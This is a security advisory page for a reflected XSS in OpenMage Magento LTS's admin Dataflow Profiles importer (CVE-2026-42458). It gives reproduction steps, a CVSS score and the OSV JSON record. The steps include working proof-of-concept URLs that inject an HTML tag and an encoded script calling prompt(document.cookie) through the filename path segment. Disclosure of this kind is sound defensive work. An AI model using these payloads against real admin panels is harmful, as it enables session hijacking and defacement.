GHSA-X8JV-Q8J2-487C

Vulnerability from github – Published: 2026-05-06 20:57 – Updated: 2026-05-15 23:49
VLAI
Summary
Magento LTS: Reflected XSS - Import -> Data Flow (profiles)
Details

A reflected XSS vulnerability was found under admin panel -> System -> Import/Export -> Dataflow - Profiles.

Steps to produce

  • Login to the admin panel

  • Go to the path System -> Import/Export -> Dataflow - Profiles

  • Select profile direction as Import.

  • Click on Import Customers

  • Upload the file.

File Link: customer_20260212_204335.csv

  • Go back to Run profile.

  • Select the uploaded file and Click on Run in Popup.

  • One can see a URL like this 

https://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/import-20260215151125-1_customer_20260212_204335.csv/

  • One can see the filename getting reflection in HTML tags.

  • Inject an HTML tag and observe.

https://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/"><h3>hacked</h3>/

image (3)

  • One can see the tag is getting executed.

  • Proceed for XSS.

https://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/%3CScRiPt%20%3Eprompt(document.cookie)%3C%2FScRiPt%3E

image (4)

  • There is an XSS popup.

Impact

Cookie stealing, JS deface, many more

Severity
5.3 (Medium)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 20.17.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "openmage/magento-lts"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "20.18.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42458"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-87"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T20:57:37Z",
    "nvd_published_at": "2026-05-15T17:16:46Z",
    "severity": "MODERATE"
  },
  "details": "A reflected XSS vulnerability was found under admin panel -\u003e  System -\u003e Import/Export -\u003e Dataflow -  Profiles.\n\n## Steps to produce\n\n+ Login to  the admin panel \n\n+ Go to the path   `System -\u003e Import/Export -\u003e Dataflow -  Profiles`\n\n+ Select profile direction as `Import`.\n\n+ Click on `Import Customers` \n\n+ Upload the file.\n\nFile Link: [customer_20260212_204335.csv](https://github.com/user-attachments/files/25629638/customer_20260212_204335.csv)\n\n+ Go back to `Run profile`.\n\n+ Select the uploaded file and Click on `Run in Popup`.\n\n+ One can see a URL like this \n\n```\nhttps://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/import-20260215151125-1_customer_20260212_204335.csv/\n```\n\n\n+ One can see the filename getting reflection in HTML tags.\n\n+ Inject an HTML tag and observe.\n\n```\nhttps://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/\"\u003e\u003ch3\u003ehacked\u003c/h3\u003e/\n``` \n\n\u003cimg width=\"1796\" height=\"302\" alt=\"image (3)\" src=\"https://github.com/user-attachments/assets/502330b0-fa73-4b90-a81f-6216a98e474a\" /\u003e\n\n+ One can see the tag is getting executed.\n\n+  Proceed for XSS.\n\n```\nhttps://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/%3CScRiPt%20%3Eprompt(document.cookie)%3C%2FScRiPt%3E\n```\n\n\u003cimg width=\"1670\" height=\"562\" alt=\"image (4)\" src=\"https://github.com/user-attachments/assets/98a75081-fa8c-4483-9078-0ab5e7e14e4d\" /\u003e\n\n\n+ There is an XSS popup.\n\n## Impact\n\nCookie stealing, JS deface, many more",
  "id": "GHSA-x8jv-q8j2-487c",
  "modified": "2026-05-15T23:49:07Z",
  "published": "2026-05-06T20:57:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OpenMage/magento-lts/security/advisories/GHSA-x8jv-q8j2-487c"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42458"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OpenMage/magento-lts"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Magento LTS: Reflected XSS - Import -\u003e Data Flow (profiles) "
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.